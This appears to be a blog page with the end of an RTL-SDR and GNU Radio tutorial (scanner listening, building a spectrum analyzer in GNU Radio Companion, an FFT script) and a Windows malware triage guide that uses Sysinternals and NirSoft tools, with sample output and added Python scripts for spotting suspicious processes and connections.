Law enforcement is another great thing to listen to. Since everything is so close together in NYC, you can pick up almost all precincts, so let's see what's going on with the 17th! It's non-trunked and operating at 476.58750 MHz, so let's key that into multimode:
root@bt:~/bin# ./multimode.py --freq 476.587M --ftune=5k

And if you keep an eye on the Spectrograph, you can see if there is activity on neighboring frequencies (precincts).



Other Notable Fun!


The GNURadio community is massive and there are a ton of people writing great code to leverage SDR's capabilities. Here's a short list of things that may appeal to our audience:

For more applications written for GNU Radio (specifically RTL-SDR) see:

Using the GNU Radio Companion


One of the most powerful components of GNU Radio is the GNU Radio Companion (GRC). It allows you to graphically program GNU Radio applications!

Creating a Spectrum Analyzer


Probably the simplest application to write using GRC is a spectrum analyzer. Since this is just meant as a quick introduction, we'll create a very stripped down spectrum analyzer to demonstrate some of the power of GRC.

Launching GRC

Launching GRC will require you to be running X, then just run:
root@bt:~# gnuradio-companion
A new window should open up, this is your development environment!

The GRC interface is split into three panes:
  1. The development area (Main Area/Left pane): This is where you'll create your flow graph
  2. Logging pane (Lower): Provides logging and debugging messages
  3. Block (Right pane): Lists the different development blocks that will make up your flow graph and application

Creating a Signal Flow Graph


Since GNU Radio can accept input from a variety of sources, the first thing we'll want to define is the actual source for our application. Since we've been using RTL-SDR, lets pick that.

Under "Sources" select "RTL2832 Source" from the Block pane and drag it into the development area.

Note: According to the comments below, it makes more sense to use the OsmoSDR source, since it's the official and latest greatest!



Next, we'll need to define something to do with our source. Since we want to create a spectrum analyzer, the "FFT sink" block is just what we need as it will show us what the spectrum looks like. We'll use the one under "WX GUI" to leverage wxPython.

Under "WX GUI Widgets" select "WX GUI FFT Sink" from the block pane and drag it into the development area.



We'll have to also connect our Source to the FFT Sink. Click once on "Out" on the Source block then click "In" on the FFT Sink block. This will take the output from our RTL2832 and send it to the FFT sink.



You'll notice that the title of the source block (RTL2832 Source) and an attribute within the block (Frequency) are both highlighted red. This indicates an error: Frequency is a required attribute and it is undefined. Let's fix that.

Double click the source block and set a frequency. Here we'll use that of our radio station (100.3 MHz), which in Hz is 100300000; in E notation that is 1003e5.



That's all there is to it! Now generate everything by going to "Build" -> "Generate" (or by pressing the generate button). You should be prompted to save first, so here I'll just save it to /root/simple_test.grc:



Then run it by going to "Build" -> "Execute" (or by pressing the execute button). A new window should open up showing the signal in real time:



Depending on the power of your system, the window may be a little unresponsive or sluggish. A Throttle block (placed between a source and a sink) is meant for flow graphs that have no hardware source, such as a file or a signal generator; the RTL source already paces the graph at its sample rate, so adding one here doesn't help and can cause overruns. Lowering the FFT Size or the Refresh Rate in the FFT Sink's properties is what actually eases the load.

If you check the "Average" box you can clean up the display:



The "Peak" checkbox will draw a line on the peaks, which can be useful if the signal is rapidly changing and you're trying to get an idea of what frequencies are being transmitted on:



If you wanted to always have the "Average" and "Peak" checked, you can modify the FFT Sink in the original drawing and set the two to "On":



To share your flows with other people, just send them your .grc (/root/simple_test.grc). You'll notice another file was created in the same directory, /root/simple_test.py. This is the Python source file for your application. If you didn't want to run GRC, you can launch the application independently:

root@bt:~ # ./simple_test.py
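The FFT sink in the flow graph above is doing something simple enough to reproduce without GNU Radio, which is a handy sanity check when you want to look at a capture offline or on a box where the toolkit isn't installed. The script below is an added example, not code generated by GRC or taken from the original post: it synthesizes a short IQ capture in the 8-bit interleaved unsigned format that rtl_sdr writes to disk (I then Q, with zero at roughly 127.5), places a single carrier 200 kHz above the tuned frequency, runs a radix-2 FFT over it in pure Python, and reports the absolute frequency of the strongest bin, the same centered view the WX GUI FFT Sink draws. The sample rate, tuned frequency and tone offset are my choices; a real capture would come from `rtl_sdr -f 100300000 -s 2048000 capture.bin`.

```python
import cmath
import math
import struct

SAMPLE_RATE = 2048000    # 2.048 MS/s, a common RTL2832U rate
CENTER_HZ = 100300000    # tuned frequency (the 1003e5 from the flow graph)
TONE_OFFSET_HZ = 200000  # where the constructed carrier sits, relative to center


def synth_rtl_capture(n_samples, tone_offset_hz, sample_rate=SAMPLE_RATE, amplitude=0.8):
    """Constructed stand-in for an rtl_sdr recording: interleaved unsigned 8-bit
    I,Q samples with 127.5 as zero, which is the format rtl_sdr writes to a file."""
    out = bytearray()
    for n in range(n_samples):
        phase = 2 * math.pi * tone_offset_hz * n / sample_rate
        i = int(round(127.5 + 127.5 * amplitude * math.cos(phase)))
        q = int(round(127.5 + 127.5 * amplitude * math.sin(phase)))
        out += struct.pack("BB", i, q)
    return bytes(out)


def read_rtl_iq(raw):
    """Decode rtl_sdr's u8 I/Q bytes into complex samples in roughly [-1, 1]."""
    return [complex((raw[k] - 127.5) / 127.5, (raw[k + 1] - 127.5) / 127.5)
            for k in range(0, len(raw) - 1, 2)]


def fft(x):
    """Recursive radix-2 decimation-in-time FFT; len(x) must be a power of two."""
    n = len(x)
    if n == 1:
        return x[:]
    even = fft(x[0::2])
    odd = fft(x[1::2])
    twiddled = [cmath.exp(-2j * math.pi * k / n) * odd[k] for k in range(n // 2)]
    return ([even[k] + twiddled[k] for k in range(n // 2)] +
            [even[k] - twiddled[k] for k in range(n // 2)])


def power_spectrum_db(samples):
    """Power per bin in dB, reordered so index 0 is the most negative offset from
    center and index n/2 is the center frequency (the FFT sink's layout)."""
    spectrum = fft(samples)
    n = len(spectrum)
    centered = spectrum[n // 2:] + spectrum[:n // 2]
    return [10 * math.log10(abs(c) ** 2 / n + 1e-12) for c in centered]


def bin_to_hz(bin_index, n_bins, sample_rate=SAMPLE_RATE, center_hz=CENTER_HZ):
    """Absolute frequency of a centered bin: center + (index - n/2) * rate / n."""
    return center_hz + (bin_index - n_bins // 2) * sample_rate / n_bins


def strongest_signal(raw, sample_rate=SAMPLE_RATE, center_hz=CENTER_HZ):
    """Return (frequency_hz, power_db) of the strongest bin in a raw rtl_sdr capture."""
    samples = read_rtl_iq(raw)
    n = 1 << (len(samples).bit_length() - 1)  # largest power of two that fits
    power = power_spectrum_db(samples[:n])
    peak = max(range(n), key=power.__getitem__)
    return bin_to_hz(peak, n, sample_rate, center_hz), power[peak]


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            raw = fh.read(2 * 4096)  # 4096 complex samples, 2 bytes each
    else:
        raw = synth_rtl_capture(4096, TONE_OFFSET_HZ)
    freq, db = strongest_signal(raw)
    print("strongest signal: %.1f kHz (%.1f dB)" % (freq / 1e3, db))
```

With 4096 samples at 2.048 MS/s each bin is 500 Hz wide, so the constructed tone lands exactly on a bin and the reported peak is 100500.0 kHz. On a real capture the peak should sit near the station's carrier; if instead it sits exactly at the center frequency on an otherwise quiet band, you are most likely looking at the tuner's DC offset, not a transmitter, which is also why the FFT sink often shows a spike in the middle of the display.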


Want to learn more? Just yesterday (seriously, GNURadio is freaking exploding because of RTL-SDR), balint256 just put together a group of GNU Radio tutorials that will take you to the next level! Check them out here!

Got tips for GNU Radio or RTL-SDR? See something I got wrong above? Speak up in the comments below!!



Tuesday, June 5, 2012

Am I pwn3d? Windows *Non-Native* Tool Triage

By Tony Lee, Jerry Pierce, and Vijay Agarwal.

This is a continuation of our previous article on performing a Windows triage--however this time we will try to avoid using native Windows tools. Note that there are lots of GUI tools that can help perform basic forensics, however we use mostly command line tools or options as it does not trample on evidence as much as the GUI tools and it makes writing the data to a file easier for offline analysis. We will continue with the same premise as before:

So, you are surfing the web, checking your email, and performing other daily tasks… $#@!, you just realized you clicked a link, opened an attachment, or visited a site that you probably should not have. So what do you do? Cry a little or take action?

Perhaps a friend, family member or neighbor approaches you and asks you to help them “fix their computer” or they say, “I think I have been hacked!”

Whatever the scenario, we have outlined some steps, using mostly non-native Windows binaries, that you can follow in order to do a little preliminary analysis to detect potential compromise and triage the system.

Indicators of Compromise Covered


  • Processes
  • Network Connections
  • Common File Locations
    • System32
    • Home Directory
  • Persistence Mechanisms
    • Services
    • Registry
    • Tasks
    • Startup Directory

If your relative/friend or family member is remote, you will most likely have to send the output to a file or have them read it to you (good luck with that if they aren’t technical), but it is a start.

Note: If you cannot coach family members to get to the cmd prompt--all hope may already be lost ;)

Examine Processes


The following tool, pslist, is from Mark Russinovich (of sysinternals--now Microsoft). Pslist can be downloaded from http://technet.microsoft.com/en-us/sysinternals/bb896682. It will list the process name, process ID (PID), CPU Time and other information.

pslist >> output.txt

Sample Output
C:\>pslist

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
Idle                  0   0   1    0      0     3:57:34.937     0:00:00.000
System                4   8  48  340      0     0:01:01.421     0:00:00.000
smss                604  11   3   19    168     0:00:00.031     4:05:30.375
csrss               652  13  12  375   1772     0:00:15.000     4:05:29.265
winlogon            676  13  17  547   7400     0:00:01.171     4:05:29.109
services            720   9  15  261   1664     0:00:03.859     4:05:28.609
lsass               732   9  22  357   3764     0:00:03.968     4:05:28.562
svchost             892   8  14  190   2888     0:00:01.156     4:05:27.890
svchost             960   8   7  235   1640     0:00:02.656     4:05:27.609
svchost            1072   8  67 1251  14668     0:00:20.593     4:05:27.406
svchost            1132   8   6   80   1272     0:00:02.156     4:05:26.875
svchost            1272   8   5   90   1196     0:00:02.781     4:05:26.625
explorer           1408   8   9  330  10304     0:00:15.421     4:05:25.578
VMwareUser         1648   8   1   26    888     0:00:01.000     4:05:23.937
ctfmon             1660   8   1   69    840     0:00:01.546     4:05:23.843
wracing            1680   8   1   19    324     0:00:41.609     4:05:23.687
sqlmangr           1692   8   2   76   1252     0:01:35.203     4:05:23.609
svchost            1808   8   5  107   1272     0:00:03.968     4:05:18.156
inetinfo           1864   8  18  269   3992     0:00:14.140     4:05:17.953
sqlservr           1880   8  21  214  13068     0:00:01.640     4:05:17.859
VMwareService       128  13   3   47    696     0:01:25.015     4:05:14.359
alg                1168   8   6  105   1132     0:00:01.656     4:05:11.046
cmd                1928   8   1   31   2264     0:00:07.937     3:58:41.046
firefox             380   8  12  343  19320     0:00:04.187     2:55:04.140
notepad            1344   8   1   45   1268     0:00:01.531     2:51:28.015
autoruns           1564   8   5  287  12564     0:00:41.437     2:34:45.015
pslist              696  13   2  115   1040     0:00:00.156     0:00:00.250

Watch for oddly named processes, and also look at the "Elapsed Time" column. If an oddly named process has roughly the same elapsed time as the bulk of the Windows system processes, it is a clue that it is being started at system boot or when you log into the system, which in turn means it has a persistence mechanism worth finding (see below).

The -t option to pslist displays the output as a tree, which makes the parent process and the rest of the process chain easy to see. A process with an unexpected parent (a command shell spawned by a service, for instance) deserves a closer look. In the sample below, wracing sits at the top level of the tree, which means the process that started it has already exited.

pslist -t >> output.txt

Sample Output
C:\>pslist -t

pslist v1.29 - Sysinternals PsList
Copyright (C) 2000-2009 Mark Russinovich
Sysinternals

Process information for PC122:

Name                             Pid Pri Thd  Hnd      VM      WS    Priv
Idle                               0   0   1    0       0      16       0
  System                           4   8  48  340    1884     212       0
    smss                         604  11   3   19    3808     404     168
      csrss                      652  13  12  375   25740    2144    1772
      winlogon                   676  13  17  547   51648    4188    7400
        services                 720   9  15  261   20220    3400    1664
          VMwareService          128  13   3   47   17764    2256     696
          svchost                892   8  14  190   59652    4728    2888
          svchost                960   8   7  235   33644    4148    1640
          svchost               1072   8  67 1251  138856   24388   14668
          svchost               1132   8   6   80   29572    3496    1272
          alg                   1168   8   6  105   32288    3536    1132
          svchost               1272   8   5   90   30980    3248    1196
          svchost               1808   8   5  107   35608    3700    1272
          inetinfo              1864   8  18  269   43944    7904    3992
          sqlservr              1880   8  21  214  559284    7768   13068
        lsass                    732   9  22  357   41392    6004    3764
explorer                        1408   8   9  330   81936   15356   10304
  firefox                        380   8  12  343   85196   29884   19320
  VMwareUser                    1648   8   1   26   27996    2888     888
  ctfmon                        1660   8   1   69   29208    3008     840
  sqlmangr                      1692   8   2   76   35200    4804    1252
  cmd                           1928   8   1   31   30848     980    2264
    pslist                       152  13   2  115   29292    2628    1040
    notepad                     1344   8   1   45   30304    3768    1268
    autoruns                    1564   8   5  287   96192   16500   12564
wracing                         1680   8   1   19    7480    1220     324

The next tool, cmdline, lists the PID, the full path to each process binary and the command line arguments it was started with (how helpful!). The tool used to be available from www.diamondcs.com.au, however that domain now appears to be squatted and no longer hosts the tool. You may be able to get a copy from a reputable friend in the business (feel free to look us up at Foundstone and we will send you a copy, malware free!). If you cannot obtain cmdline, the native wmic tool can produce equivalent process ID and command line information.

cmdline >> output.txt

Sample Output
C:\>cmdline
CmdLine - DiamondCS Freeware Console Tools (www.diamondcs.com.au)
---
Found 30 processes.

-snip-

C:\WINDOWS\system32\services.exe [720]
  C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\ctfmon.exe [1660]
  "C:\WINDOWS\system32\ctfmon.exe"

C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
  "C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

C:\WINDOWS\system32\notepad.exe [1908]
  notepad test.txt

Once the command has been executed, a well-trained eye can usually spot something odd: a process running from a Temp directory or a user profile, or one whose name mimics a Windows binary. If something is unfamiliar, there are many sites that can be used to investigate a binary name, such as http://www.processlibrary.com/.

No results from processlibrary.com can be as concerning as a positive bad hit:

Example:
Search results for: wracing.exe
Your search "wracing.exe" did not match any documents.
Make sure the search term was spelled correctly.
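As an added example for offline analysis (this script is not part of the original article and is not one of the Sysinternals or DiamondCS tools), the Python below applies the checks just described to saved pslist and cmdline output: it joins the two listings on PID, flags every process whose image lives in a user-writable location or outside the Windows and Program Files directories, and notes when such a process has been running almost as long as the oldest process on the box, which is the "elapsed time matches boot" clue. The sample text is constructed from the listings shown above (trimmed to a few rows); the path markers and the two-minute boot window are assumptions to tune for your environment, and a legitimate program installed in an odd place will trip the path check too.

```python
import re
from datetime import timedelta

# Assumed markers for locations a non-admin user (and so a drive-by download) can write to.
USER_WRITABLE_MARKERS = ("\\documents and settings\\", "\\users\\", "\\temp\\", "\\appdata\\")
# Where legitimate binaries normally live; anything else is worth a second look.
SYSTEM_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample input modelled on the pslist output above (trimmed to a few rows).
PSLIST_OUTPUT = """Process information for PC122:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
Idle                  0   0   1    0      0     3:57:34.937     0:00:00.000
System                4   8  48  340      0     0:01:01.421     0:00:00.000
smss                604  11   3   19    168     0:00:00.031     4:05:30.375
winlogon            676  13  17  547   7400     0:00:01.171     4:05:29.109
explorer           1408   8   9  330  10304     0:00:15.421     4:05:25.578
wracing            1680   8   1   19    324     0:00:41.609     4:05:23.687
firefox             380   8  12  343  19320     0:00:04.187     2:55:04.140
pslist              696  13   2  115   1040     0:00:00.156     0:00:00.250
"""

# Constructed sample input modelled on the cmdline output above.
CMDLINE_OUTPUT = r"""CmdLine - DiamondCS Freeware Console Tools (www.diamondcs.com.au)
---
Found 4 processes.

C:\WINDOWS\system32\winlogon.exe [676]
  winlogon.exe

C:\WINDOWS\explorer.exe [1408]
  C:\WINDOWS\Explorer.EXE

C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe [1680]
  "C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe"

C:\Program Files\Mozilla Firefox\firefox.exe [380]
  "C:\Program Files\Mozilla Firefox\firefox.exe"
"""

PSLIST_ROW = re.compile(r"^(\S+)\s+(\d+)(?:\s+\d+){4}\s+\d+:\d+:\d+\.\d+\s+(\d+:\d+:\d+\.\d+)\s*$")
CMDLINE_HEAD = re.compile(r"^(\S.*?) \[(\d+)\]$")


def _elapsed(text):
    """Turn pslist's H:MM:SS.mmm into a timedelta."""
    hours, minutes, seconds = text.split(":")
    return timedelta(hours=int(hours), minutes=int(minutes), seconds=float(seconds))


def parse_pslist(text):
    """Return {pid: (name, elapsed_time)} from saved `pslist` output."""
    rows = {}
    for line in text.splitlines():
        m = PSLIST_ROW.match(line)
        if m:
            rows[int(m.group(2))] = (m.group(1), _elapsed(m.group(3)))
    return rows


def parse_cmdline(text):
    """Return {pid: (image_path, command_line)} from saved `cmdline` output."""
    procs, lines = {}, text.splitlines()
    for i, line in enumerate(lines):
        m = CMDLINE_HEAD.match(line)
        if m:  # the command line is printed indented on the following line
            cmd = lines[i + 1].strip() if i + 1 < len(lines) else ""
            procs[int(m.group(2))] = (m.group(1), cmd)
    return procs


def triage_processes(pslist_text, cmdline_text, boot_window=timedelta(minutes=2)):
    """Join both listings on PID and flag the processes a triage should look at first."""
    procs, paths = parse_pslist(pslist_text), parse_cmdline(cmdline_text)
    # The longest-lived process (smss here) approximates the time since boot.
    uptime = max(elapsed for _, elapsed in procs.values())
    findings = []
    for pid, (name, elapsed) in sorted(procs.items()):
        path, cmd = paths.get(pid, ("", ""))
        low = path.lower()
        reasons = []
        if any(marker in low for marker in USER_WRITABLE_MARKERS):
            reasons.append("image in user-writable location")
        elif path and not low.startswith(SYSTEM_PREFIXES):
            reasons.append("image outside Windows/Program Files")
        if not reasons:
            continue
        if uptime - elapsed <= boot_window:
            reasons.append("elapsed time matches system uptime (started at boot/logon)")
        findings.append({"pid": pid, "name": name, "path": path, "cmdline": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_processes(PSLIST_OUTPUT, CMDLINE_OUTPUT):
        print(f"[{f['pid']}] {f['name']}: {f['path']}\n    " + "; ".join(f["reasons"]))
```

Point it at the real files with triage_processes(open("pslist.txt").read(), open("cmdline.txt").read()). The elapsed-time heuristic is only as good as the oldest process in the listing: if pslist was run a minute after boot, every process will look boot-started, so treat that reason as supporting evidence rather than a verdict.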

Examine Network Connections


The following tool, CurrPorts, is from Nirsoft and is available from http://www.nirsoft.net/utils/cports.html. Please see the full manual at the download site for the many options available. We are just listing our favorite options below:

cports /stext cportsoutput.txt

Sample Output
C:\>cports /stext cportsoutput.txt

-snip-
==================================================
Process Name      : wracing.exe
Process ID        : 1680
Protocol          : TCP
Local Port        : 1750
Local Port Name   : 
Local Address     : 192.168.200.53
Remote Port       : 443
Remote Port Name  : https
Remote Address    : 63.232.79.43
Remote Host Name  : 
State             : Established
Process Path      : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe
Product Name      : 
-snip-
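As an added example (not part of the original article or of CurrPorts), the script below reads a saved cports /stext file for offline analysis. It splits the file on the "====" separators, treats each "Key : Value" block as one socket, and flags sockets whose owning process runs from a user-writable location or outside the Windows and Program Files directories when that socket is either established to an address outside the local network or listening for inbound connections. The sample text is constructed to follow the format shown above, using the documentation ranges 198.51.100.0/24 and 203.0.113.0/24 as stand-ins for Internet hosts; the list of "local" networks and the path markers are assumptions, and as with the process check a legitimate program installed in an odd place will show up too.

```python
import ipaddress

# Assumed markers for locations a non-admin user can write to, and the normal homes of binaries.
USER_WRITABLE_MARKERS = ("\\documents and settings\\", "\\users\\", "\\temp\\", "\\appdata\\")
SYSTEM_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Anything outside these is treated as "the Internet" (RFC 1918, loopback, link-local, unspecified).
LOCAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample modelled on `cports /stext` output; remote addresses are documentation
# ranges standing in for Internet hosts, not real endpoints.
CPORTS_OUTPUT = r"""
==================================================
Process Name      : firefox.exe
Process ID        : 380
Protocol          : TCP
Local Port        : 1742
Local Address     : 192.168.200.53
Remote Port       : 80
Remote Port Name  : http
Remote Address    : 198.51.100.7
Remote Host Name  : 
State             : Established
Process Path      : C:\Program Files\Mozilla Firefox\firefox.exe
==================================================
Process Name      : wracing.exe
Process ID        : 1680
Protocol          : TCP
Local Port        : 1750
Local Address     : 192.168.200.53
Remote Port       : 443
Remote Port Name  : https
Remote Address    : 203.0.113.45
Remote Host Name  : 
State             : Established
Process Path      : C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe
==================================================
Process Name      : inetinfo.exe
Process ID        : 1864
Protocol          : TCP
Local Port        : 21
Local Port Name   : ftp
Local Address     : 0.0.0.0
Remote Address    : 0.0.0.0
State             : Listening
Process Path      : C:\WINDOWS\system32\inetsrv\inetinfo.exe
==================================================
Process Name      : svchost.exe
Process ID        : 1132
Protocol          : UDP
Local Port        : 53
Local Address     : 192.168.200.53
Remote Address    : 192.168.200.1
State             : 
Process Path      : C:\WINDOWS\system32\svchost.exe
==================================================
"""


def parse_cports(text):
    """Split cports text output into one {field: value} dict per socket."""
    records, current = [], {}
    for line in text.splitlines():
        if line.startswith("====="):
            if current:
                records.append(current)
            current = {}
        elif ":" in line:
            key, _, value = line.partition(":")  # first colon only; paths contain "C:"
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def _is_external(addr):
    """True when the address parses and lies outside every network in LOCAL_NETWORKS."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:  # blank or malformed, e.g. an unconnected UDP socket
        return False
    return not any(ip in net for net in LOCAL_NETWORKS)


def _suspicious_path(path):
    low = path.lower()
    if any(marker in low for marker in USER_WRITABLE_MARKERS):
        return "process image in user-writable location"
    if low and not low.startswith(SYSTEM_PREFIXES):
        return "process image outside Windows/Program Files"
    return None


def flag_connections(text):
    """Return sockets owned by oddly located processes that talk to the outside or listen."""
    findings = []
    for rec in parse_cports(text):
        reason = _suspicious_path(rec.get("Process Path", ""))
        if reason is None:
            continue
        external = _is_external(rec.get("Remote Address", ""))
        listening = rec.get("State", "").lower() == "listening"
        if external or listening:
            findings.append({
                "pid": int(rec["Process ID"]),
                "process": rec.get("Process Name", ""),
                "remote": f"{rec.get('Remote Address', '')}:{rec.get('Remote Port', '')}",
                "state": rec.get("State", ""),
                "reason": reason + (", external connection" if external else ", listening for inbound connections"),
            })
    return findings


if __name__ == "__main__":
    for f in flag_connections(CPORTS_OUTPUT):
        print(f"[{f['pid']}] {f['process']} -> {f['remote']} ({f['state']}): {f['reason']}")
```

A system binary such as svchost.exe talking to the Internet is not flagged by this script because its path is normal; that is deliberate, since on a home machine most such traffic is legitimate, but it also means a process injected into a system binary is invisible here and has to be caught through the persistence checks below.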

Examine Common File Locations


In terms of examining file locations, there may not be many tools better than the good old native "dir" command. It has been present in Windows since before the dawn of time, however its options may not be well known to you or your family members. Running "dir" with the following switches produces a listing sorted by file creation time (/o:d sorts by date and /t:c tells dir to show and sort on the creation time rather than the last-write time).

System32


Many files are located here, and thus this is a common place for malware to hide among the weeds. Compare the creation times of the newest files with the date the trouble started.
dir /o:d /t:c c:\windows\system32 >> output.txt

Sample Output
C:\>dir /o:d /t:c c:\windows\system32
-snip-
01/07/2010  05:48 PM           689,152 xpsp3res.dll
01/07/2010  06:02 PM    <dir>          en
01/07/2010  06:02 PM    <dir>          scripting
01/07/2010  06:02 PM    <dir>          en-us
01/07/2010  06:19 PM         1,676,288 xpssvcs.dll
01/07/2010  06:19 PM           575,488 xpsshhdr.dll
01/07/2010  06:19 PM           117,760 prntvpt.dll
01/07/2010  06:20 PM    <dir>          XPSViewer
01/07/2010  06:34 PM             2,560 xpsp4res.dll
01/07/2010  07:39 PM        25,966,024 MRT.exe
01/07/2010  07:50 PM             3,706 TZLog.log
            2009 File(s)    408,261,849 bytes
              52 Dir(s)   2,505,060,352 bytes free

User’s home directory


This is a popular spot for malware to hide because anything running as the user, a drive-by download or a malicious attachment included, has permission to write here without administrative rights. The /a switch includes hidden and system files and /s recurses into subdirectories such as Local Settings\Temp.
dir /a /s /o:d /t:c "%USERPROFILE%" >> output.txt

Sample Output
dir /a /s /o:d /t:c "%USERPROFILE%"

-SNIP-
 Directory of C:\Documents and Settings\Administrator\Local Settings\Temp
01/07/2010  07:00 PM            54,272 Set29F.tmp
01/07/2010  07:42 PM    <dir>          NDP1.1sp1-KB953297-X86
01/07/2010  07:47 PM            14,010 ASPNETSetup_00002.log
09/13/2010  09:24 PM             8,141 lick_me.jpg
09/13/2010  09:24 PM            37,376 wracing.exe
09/13/2010  09:24 PM            28,160 wracing.dll
09/13/2010  09:28 PM    <dir>          plugtmp
03/23/2012  01:43 PM    <dir>          VMwareDnD
03/23/2012  02:54 PM               104 pdracing.tmp
-SNIP-

Note: The filenames above are from real malware--we did not make those up.

Investigating Persistence


Malware wants to survive a reboot, and the way this is accomplished is called a “Persistence Mechanism”. Sometimes the persistence mechanism can give away the presence of malicious software on a system. The following persistence mechanisms will be examined:
  • Services
  • Registry
  • Scheduled Tasks
  • Startup Directory

Examine Services


Examining services leverages both native and non-native tools. The following command has been natively present in Windows for ages and is the usual way to list the services that are currently started.

net start >> output.txt

Sample Output
C:\>net start
These Windows services are started:

   Application Layer Gateway Service
   Automatic Updates
   COM+ Event System
   Computer Browser
   Cryptographic Services
   DCOM Server Process Launcher
   DHCP Client
   Distributed Link Tracking Client
   DNS Client
   Event Log
   FTP Publishing
   Help and Support
   IIS Admin
   IPSEC Services
   Logical Disk Manager
   MSSQLSERVER
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Protected Storage
   Remote Access Connection Manager
   Remote Procedure Call (RPC)
   Remote Registry
   Secondary Logon
   Security Accounts Manager
   Security Center
   Server
   Shell Hardware Detection
   System Event Notification
   Task Scheduler
   TCP/IP NetBIOS Helper
   Telephony
   Terminal Services
   VMware Tools Service
   WebClient
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Time
   Workstation
   World Wide Web Publishing

The command completed successfully.


The psservice command below (discussed in a moment) could also be used; however, its output is not as concise as that of "net start":
psservice query -s active


You will see sample output from this very useful tool in a bit.
The following command has been natively present in Windows since XP Professional and 2003. It lists each process name and process ID (PID) together with the service names (the registry key names, not the display names) hosted in that process, which is what lets you tell one svchost.exe from another.
tasklist /svc >> output.txt


Sample Output
C:\>tasklist /svc

Image Name                   PID Services
========================= ====== ============================================
System Idle Process            0 N/A
System                         4 N/A
smss.exe                     604 N/A
csrss.exe                    652 N/A
winlogon.exe                 676 N/A
services.exe                 720 Eventlog, PlugPlay
lsass.exe                    732 PolicyAgent, ProtectedStorage, SamSs
svchost.exe                  892 DcomLaunch, TermService
svchost.exe                  960 RpcSs
svchost.exe                 1072 Browser, CryptSvc, Dhcp, dmserver,
                                 EventSystem, helpsvc, lanmanserver,
                                 lanmanworkstation, Netman, Nla, RasMan,
                                 Schedule, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, TapiSrv, TrkWks, W32Time,
                                 winmgmt, wscsvc, wuauserv
svchost.exe                 1132 Dnscache
svchost.exe                 1272 LmHosts, RemoteRegistry
explorer.exe                1408 N/A
VMwareUser.exe              1648 N/A
ctfmon.exe                  1660 N/A
wracing.exe                 1680 N/A
sqlmangr.exe                1692 N/A
svchost.exe                 1808 WebClient
inetinfo.exe                1864 IISADMIN, MSFtpsvc, W3SVC
sqlservr.exe                1880 MSSQLSERVER
VMwareService.exe            128 VMTools
alg.exe                     1168 ALG
cmd.exe                     1928 N/A
firefox.exe                  380 N/A
notepad.exe                 1344 N/A
tasklist.exe                1820 N/A
wmiprvse.exe                1892 N/A

The non-native tool psservice.exe is another Sysinternals tool from Mark Russinovich (now Microsoft) and can be found at http://technet.microsoft.com/en-us/sysinternals/bb897542. It covers much of what the native "sc" command does, but unlike sc it can be run against a remote machine with credentials other than those of the current user. Additionally, it provides the binary path and description of a service with the single query shown below:
psservice config [service name] >> output.txt

Sample Output
C:\>psservice config webclient

PsService v2.24 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: WebClient
DISPLAY_NAME: WebClient
Enables Windows-based programs to create, access, and modify Internet-based files. If this service is stopped, these functions will not be available. If this service is disabled, any services that explicitly depend on it will fail to start.

        TYPE              : 10 WIN32_OWN_PROCESS
        START_TYPE        : 2  AUTO_START
        ERROR_CONTROL     : 1  NORMAL
        BINARY_PATH_NAME  : C:\WINDOWS\System32\svchost.exe -k LocalService
        LOAD_ORDER_GROUP  : NetworkProvider
        TAG               : 0
        DEPENDENCIES      : MRxDAV
        SERVICE_START_NAME: NT AUTHORITY\LocalService

If you would like to get all of the services, descriptions, and full paths to the binaries, omit the service name at the end. For example:
psservice config

Examine Registry Entries and the Startup Directory


In the prior article we used two native Windows binaries to investigate this data, the reg command and dir command. In this article everything can be achieved with one tool--autorunsc. This is another tool from Mark Russinovich (of sysinternals--now Microsoft). It can be downloaded at http://technet.microsoft.com/en-us/sysinternals/bb963902.
autorunsc -l >> output.txt

Sample Output
C:\>autorunsc -l

Sysinternals Autoruns v10.06 - Autostart program viewer
Copyright (C) 2002-2010 Mark Russinovich and Bryce Cogswell
Sysinternals - www.sysinternals.com

-snip-

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
   putbginfo.bat.lnk
     C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\putbginfo.bat.lnk
     File not found: C:\TOOLS\bginfo\putbginfo.bat


HKCU\Software\Microsoft\Windows\CurrentVersion\Run
   ctfmon.exe
     C:\WINDOWS\system32\ctfmon.exe
     CTF Loader
     Microsoft Corporation
     5.1.2600.5512
     c:\windows\system32\ctfmon.exe
     5f1d5f88303d4a4dbc8e5f97ba967cc3 (MD5)
     99cb7370f16773c8e2d0c86fe805ec638ab126e9 (SHA-1)
     5fb24fc7916a6e6b3be7d84cb1684215b266cd1495575c2e5672b8447932e5b1 (SHA-256)
   wracing
     C:\Documents and Settings\Administrator\Local Settings\Temp\wracing.exe -installkys
     c:\documents and settings\administrator\local settings\temp\wracing.exe
     862cac1ffae3ca515f1c8588e3c3c394 (MD5)
     fb38ac1459da93f36be0af0999618a2f643e2fc8 (SHA-1)
     ede018f2be5f4655d71c0b02db394b4ff332aacc508915de47bcaf2c1db0cc78 (SHA-256)
-snip-

